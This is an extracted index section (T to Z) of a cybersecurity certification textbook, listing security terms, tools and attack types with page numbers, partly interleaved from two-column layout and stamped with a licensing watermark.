threat hunting, 64-65 dark web, 25-26
technology diversity, 533-534
threat intelligence Request for Comments
temperature sensors, 550
providers, 26 (RFC), 28
Temporal Key Integrity Protocol
threat intelligence sources social media, 28
(TKIP), 237
Automated Indicator threats, identifying, 500
Tenable Nessus, 58
Service (AIS), 30 three-way handshake, 158
Tenable Network Security,
file/code repositories, 30 Ticket Granting Service, Kerberos
Nessus, 42
structured threat authentication, 155-156
terminal access controller
information eXpression time-based login policy, 193-194
access-control system
(STIX), 29-30 Time-Based One-Time Password
(TACACS+), 167
threat maps, 30 Algorith (TOTP), 169
territory laws, 14
vulnerability databases time-based restrictions
terrorist group, influence
and feeds, 30 impossible travel time/risky
campaigns, 82
threat hunting login policy, 194
test access port (TAP)
advisories and bulletins, 64 time-based login policy,
passive and active, 269-270
intelligence fusion, 64-65 193-194
sniffing with, 42
maneuver, 65 time of day policy, 193
test/integration, development
threat data feeds, 64-65 timelines, 486-487, 494
environments, 400
vulnerability scanning time of check to time of use
tethering connection methods,
techniques, 64-65 (TOCTTOU), 368
357-358
threat intelligence providers time of day policy, 193

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021

time offset, 486
time synchronization, 289
timing attack, 414
TKIP (Temporal Key Integrity
Protocol), 237
TLDs (Top Level Domains), 287
TLS. see Transport Layer Security
(TLS)
TLS VPN, 303-304
token-based key card lock, 542
tokenization, database
deidentification methods, 452
token keys and static codes,
167-168
tokens, 180
tombstone, 450
Top Level Domains (TLDs), Key
Signing Key, 287
Top-Level NTP servers
(stratum 1), 289
topologies, demilitarized zone
(DMZ)
screened hosts, 223
screened subnet, 222
triple-homed firewall, 222-223
topology discovery
(footprinting), 36-37
TOR (The Onion Router), 25, 26
TOTP (Time-Based One-Time
Password Algorithm), 169
TPM (Trusted Platform Module),
164-165
TPM (trusted platform
module), 180
traceroute
network reconnaissance
tools, 37
packet injection and
replay, 44-45
tracert, network reconnaissance
tools, 37
traffic analysis, 43-44
training/policies, onboarding
policies, 181
training technique diversity
capture the flag (CTF),
210-211
computer-based training and
gamification, 211
phishing campaigns, 210
Transient Electromagnetic
Pulse Emanation Standard
(TEMPEST), 550
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
transit gateways, 424
transparent proxy, 261-262
Transport Control Protocol (TCP),
weak network configurations, 52
transport encryption (data-in-
transit), 112
transport layer (layer 4), 425
transport layer (OSI Layer 4),
257-258
Transport Layer Security (TLS)
application log files, 471
cipher suites, 108, 293
secure application protocols,
292-294
secure wireless
infrastructure, 241-242
SSL/TLS versions, 293-294
Transport Layer Security (TLS) VPN
Open VPN, 303-304
Point-to-Point Protocol
(PPP), 304
Point-to-Point Tunneling
Protocol (PPTP), 303
Secure Sockets Tunneling
Protocol (SSTP), 304
SSL VPN, 303-304
transport mode, 306
transposition cipher, 98
trapdoor function, 101
treat actors, types of
advanced persistent threats,
20-21, 21
competitors, 21
criminal syndicates, 21
guidelines for, 33
hackers, 20
hacker teams, 20
hacktivists, 20
insider threats, 21-22
nation state actors, 21
script kiddies, 20
state actors, 20-21, 21
treat intelligence, 459-460
trend analysis, 468
triple-homed firewall, 222-223
TRNG. see true random number
generator (TRNG)
TRNG (true random number
generator), 114-115
Trojans
defined, 82, 83
static known treats, 19
Index | I-41
true random number generator
(TRNG), 114-115
trust anchor, 318-319
Trusted Automated eXchange of
Indicator Information (TAXII), 30
Trusted Computing Group
(TCG), 321
Trusted Platform Module (TPM),
164-165
trusted platform module (TPM),
180, 318-319
trust model, 127
TTP. see tactics, techniques, and
procedures (TTP)
tunnel, 301
tunnel mode, 306
turnstile, 543
two-factor authentication (2FA),
151, 170
two-person integrity/cpmtrp, 546
two-step verification, 170
typosquatting, 79
U
U2F (Universal Second
Factor), 168
UAC (user account control),
201-202
UAV (drones/unmanned aerial
vehicle), 69-70
Ubuntu Linux
RedHat Linux container,
413-414
root accounts, 185
Uder Datagram Protocol (UDP)
transport layer (OSI Layer 4),
257
weak network configurations,
52
UEBA. see user and entity
behavior analytics (UEBA)
UEM. see unified endpoint
management (UEM)
unauthorized requests, 381
unformatted error messages,
weak network configurations, 53
unified endpoint management
(UEM), 345
unified extensible firmware
interface (UEFI), 319
uniform resource locator (URL)
Index
 I-42 | Index
hypertext transfer protocol
secure (HTTPS), 292
redirection, 286
uniform resource locator (URL)
analysis
HTTP methods, 372-373
percent encoding, 373
unintentional threat, 18
uninterruptible power supplies
(UPSs), 517
unit tests, 390
Universal Second Factor
(U2F), 168
unreachable code, 386
unsecured root accounts, weak
host configurations, 51-52
unsecure protocols
dangers of, 284
weak network configurations,
52
update (read/write access), 288
URL (uniform resource locator),
286, 292
usage audits, 195-196
USB connection methods, 360
USB data blocker, 543
USB key, 164
USB security, 321-322, 543
user account control (UAC),
201-202
user accounts, security identifier
(SID), 191
user-agent field, 470
user-agent string, 470
user and entity behavior
analytics (UEBA), 90, 271,
277-278, 479
user and role-based training,
209-210
user traffic, 272
user training, 533
UTC (Coordinated Universal
Time), 289
V infrastructure of, 411-413
variables, Python, 391
vascular biometrics, 173
vaults, secure areas, 549
vehicles and drones, 338
vein matching scanners, 173
vendor diversity, 534
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
vendor management, 54
vendor-specific guides, secure
configuration guides, 12-13
vendor websites, threat
intelligence providers, 27
version control, 401
vertical (sector-specific)
legislation, 13-14
vertical privilege escalation, 366
video interviews, 486
video surveillance, 336-337
virtual appliance virtual
firewalls, 265
virtual desktop environment
(VDE), 413
virtual desktop infrastructure
(VDI), 344, 412-413
virtual firewalls, 265
virtualization technologies
application virtualization,
413-414
components of
guest operating systems,
411
host hardware, 411
hypervisor/virtual
machine monitor
(VMM), 411
Virtual Machines (VM), 411
container virtualization,
413-414
thin clients, 412-413
virtual desktop environment
(VDE), 413
virtual desktop infrastructure
(VDI), 412-413
VM escaping protection,
414-415
VM sprawl avoidance, 415-416
virtual LANs (VLAN), 217-218
virtual machine life cycle
management (VMLM), 416
Virtual Machines (VM)
geographical redundancy, 520
VM escaping protection,
414-415
VM sprawl avoidance, 415-416
Virtual Network Computing
(VNC), 310
virtual private cloud (VPC)
endpoints, 424
public and private
subnets, 423
transit gateways, 424
virtual private network (VPN)
cloud networking security, 423
HTML5 VPN, 310
penetration testing, 70
remote access architecture,
301-302
secure network protocols, 292
site-to-site model, 302
viruses
boot virus, 83
defined, 82, 83
macro virus, 83
memory resident virus, 83
multipartite, 83
non-resident/file infector, 83
polymorphic, 83
script virus, 83
static known treats, 19
VirusTotal, open source
intelligence (OSINT), 28, 30
vishing, 77-78
visibility, 432
visitor logs, 546
Visual Basic for Applications
(VBA), 396-397
visualization tools, netflow/
IPFIX, 473
VLAN (virtual LANs), 217-218
VM escaping protection, 414-415
VM sprawl avoidance, 415-416
VMware
ESXi Server, 412
ThinApp, 413-414
Workstation, 411
VNC (Virtual Network
Computing), 310
voice and video services
Real-Time Transport Protocol
(RTP), 298-299
secure transport protocol
(SRTP), 299
Session Initiation Protocol
(SIP), 298-299
Voice over IP (VoIP), 298-299
voice over IP (VoIP)
specialized systems, 337
traffic managers, 471
voice and video services,
298-299
 Index | I-43

voice recognition, 175, 348 W web application firewalls,

Volatility Framework, 491, 273, 425
W3C extended log file format,
492, 492 web application scanners, 59
470
volume-based trend analysis, web application security
W3 Schools, 373
468 response headers, 384-385
walkthrough exercises, 462, 512
Volume Purchase Program, 345 secure cookies, 384
WAN, 216
Volume Shadow Copy Service web feed, 295
WAP (wireless access point)
(VSS), 525-526 web/HTTP access logs, 470
placement, 235
VPCs and transit gateways, 424 web metadata, 471
WAP (wireless access points), 23,
VPN. see virtual private network web server applications, 13
217-218
(VPN) web server certificate types,
war driving, 69
VPN client configuration 132-133
warm site, 533
Always-on VPN, 308-309 WEP (wired equivalent
waterfall model software
full tunnel, 309 privacy), 237
development life cycle (SDLC),
split tunnel, 309 whaling, 77-78
400, 401-403
vulnerability assessments WhatsApp, 360, 458
watering hole attack, 79
defined, 57 white box, 68
weak encryption, 52-53
risk management, 500 white box cryptography, 113
weak host configurations, 51-52
security assessment, 18 white hat hacker, 20
weak key, 114-115
vulnerability databases and white team, penetration testing,
weak network configurations,
feeds, 30 68-69
52-53
vulnerability feed, 59 Wi-Fi authentication methods,
weaponization, 460
vulnerability scanning 238
wearables, 335
techniques Wi-Fi connection methods,
wearable technology, 359
application and web 357-358
web, as attack vectors, 23
application scanners, 59 Wi-Fi direct, 357
web application attacks
configuration review, 63 Wi-Fi Pineapple, 69
application programming
credentialed vs. non- Wi-Fi protected access (WPA),
interfaces (APIs) attacks, 374
credentialed scanning, 61 117, 237-238, 357
canonicalization attack, 379
false positives, false Wi-Fi protected access (WPA2),
command injection attack,
negatives, log reviews, 61-62 237-238
379
intrusive vs. non-intrusive, 60 Wi-Fi protected access (WPA3),
cross-site scripting (XSS)
network vulnerability 238-239
attacks, 376-377
scanner, 58 Wi-Fi protected setup (WPS), 239
directory traversal injection
threat hunting, 64-65 Wi-Fi tethering, 357-358
attack, 379
vulnerability scan outputs, 470 WikiLeaks, 20
extensible markup language
vulnerability types Windows
(XML) injection, 378
impact of, 53-54 Active Directory Certificate
Lightweight Directory Access
kernel vulnerabilities, 50-51 Services, 141
Protocol (LDAP) injection, 379
legacy platform administrator accounts,
replay attacks, 374-375
vulnerabilities, 51 184-185
server-side request forgery
patch management, 50-51 AppLocker, 394
(SSRF), 380-389
software vulnerabilities, authentication process
session hijacking, 375-376
50-51 Local Security Authority
structured query language
third-party risks, 54-55 (LSA), 154
(SQL) injection attacks,
weak host configurations, NT LAN Manager (NTLM)
377-378
51-52 authentication, 154
uniform resource locator
weak network configurations, remote sign-in, 154
(URL) analysis, 372-373
52-53 Security Accounts
XML External Entity
zero-day vulnerability, 51 Manager (SAM), 154
attack, 378
single sign-on (SSO), 155

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 I-44 | Index

Certificate Services, 139 as attack vectors, 23 X

Defender Application Control network appliances, 217-218
XCCDF (Extensible Configuration
(WDAC), 394 placement, 235
Checklist Description Format), 63
file integrity monitoring wireless controllers, 236-237
XML External Entity attack, 378
(FIM), 272 wireless network installation
XML injection attacks, 295, 378
File Sharing/Server Message considerations
X-Ways, 491
Block (SMB), 369 site survey and heat
FireEye, 21, 27, 41, 492 maps, 236
F-Response TACTICAL, 492 wireless access point (WAP) Z
ipconfig, 36 placement, 235 Zed Attack Proxy (ZAP)
Memoryze, 492 Wireshark, 43-44, 294 exploitation frameworks, 46
Netcat, 46-47 witness interviews, 486 web server applications, 13
nslookup, 41 work recovery time (WRT), 509 Zeek Network Monitor (Bro),
pathping, 37 worms 60, 268
PowerShell script Code Red worm, 84 zero-day exploits, 369
environment, 392-393 Conflicker worm, 84 zero-day vulnerability, 51
Python, 392 defined, 82, 84-85 zero filling, 554
Software Restriction Policies WPA (Wi-Fi protected access), zero trust, 224-225
(SRP), 394 117, 237-238 Zigbee, 333-334, 335
tracert, 37 WPA2 (Wi-Fi protected access), zone networks, 220, 422-423
WinHex, 491, 492 237-238 zone-redundant storage, 422
WinRM, 311 WPA3 (Wi-Fi protected access), Z-Wave, 333-334, 335
WinRS, 311 238-239
wired equivalent privacy WPS (Wi-Fi protected setup), 239
(WEP), 237 wrappers, 339
wireless access points (WAP)

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021